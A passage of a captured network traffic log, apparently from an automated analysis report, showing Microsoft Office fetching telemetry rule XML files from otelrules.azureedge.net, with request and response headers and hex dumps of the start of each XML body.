                2024-10-07 01:27:06 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                Session IDSource IPSource PortDestination IPDestination Port
                134192.168.2.44988113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1370
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                ETag: "0x8DC582BDE62E0AB"
                x-ms-request-id: 838d7376-001e-0014-17fe-165151000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd4824mj9d6vp65b6n40000000330000000000xug
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:06 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                Session IDSource IPSource PortDestination IPDestination Port
                135192.168.2.44988313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1397
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                ETag: "0x8DC582BE156D2EE"
                x-ms-request-id: 7d18055e-701e-0098-56ff-16395f000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48gqrfwecymhhbfm800000001n000000000ctxe
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:06 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                Session IDSource IPSource PortDestination IPDestination Port
                136192.168.2.44988213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1360
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                ETag: "0x8DC582BEDC8193E"
                x-ms-request-id: b1fbfe33-a01e-003d-4fd4-1698d7000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48p2j6x2quer0q02800000002x000000000q3bb
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:06 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                137192.168.2.44988413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1406
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                ETag: "0x8DC582BEB16F27E"
                x-ms-request-id: 770fdf22-501e-0035-0d02-17c923000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48xdq5dkwwugdpzr0000000036g000000000x43
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:06 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                Session IDSource IPSource PortDestination IPDestination Port
                138192.168.2.44988513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:06 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1369
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                ETag: "0x8DC582BE32FE1A2"
                x-ms-request-id: c55b1dc3-701e-0097-42e9-16b8c1000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48jwrqbupe3ktsx9w000000030g000000009u54
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:06 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                Session IDSource IPSource PortDestination IPDestination Port
                139192.168.2.44988613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1414
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                ETag: "0x8DC582BE03B051D"
                x-ms-request-id: 4543d13f-701e-0050-5a04-176767000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48762wn1qw4s5sd3000000002kg00000000q0gc
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                Session IDSource IPSource PortDestination IPDestination Port
                140192.168.2.44988713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:07 GMT
                Content-Type: text/xml
                Content-Length: 1377
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                ETag: "0x8DC582BEAFF0125"
                x-ms-request-id: fba86ca6-e01e-00aa-5200-17ceda000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012707Z-1657d5bbd48q6t9vvmrkd293mg00000002tg000000009e29
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                Session IDSource IPSource PortDestination IPDestination Port
                141192.168.2.44988813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:06 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:06 GMT
                Content-Type: text/xml
                Content-Length: 1399
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                ETag: "0x8DC582BE0A2434F"
                x-ms-request-id: 961c0255-701e-005c-1406-17bb94000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012706Z-1657d5bbd48sqtlf1huhzuwq7000000002e000000000sbh9
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                Session IDSource IPSource PortDestination IPDestination Port
                142192.168.2.44988913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:07 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:07 GMT
                Content-Type: text/xml
                Content-Length: 1362
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                ETag: "0x8DC582BE54CA33F"
                x-ms-request-id: 401481e1-301e-0099-6a5a-176683000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012707Z-1657d5bbd48lknvp09v995n79000000002cg00000000g8va
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                143192.168.2.44989013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:07 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:07 GMT
                Content-Type: text/xml
                Content-Length: 1409
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                ETag: "0x8DC582BDFC438CF"
                x-ms-request-id: 7cb43a82-e01e-0033-45fe-164695000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012707Z-1657d5bbd48f7nlxc7n5fnfzh000000002dg00000000e2ce
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                Session IDSource IPSource PortDestination IPDestination Port
                144192.168.2.44989113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:07 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:07 GMT
                Content-Type: text/xml
                Content-Length: 1372
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                ETag: "0x8DC582BE6669CA7"
                x-ms-request-id: 9139889b-001e-0079-22f3-1612e8000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012707Z-1657d5bbd48762wn1qw4s5sd3000000002s00000000021bg
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
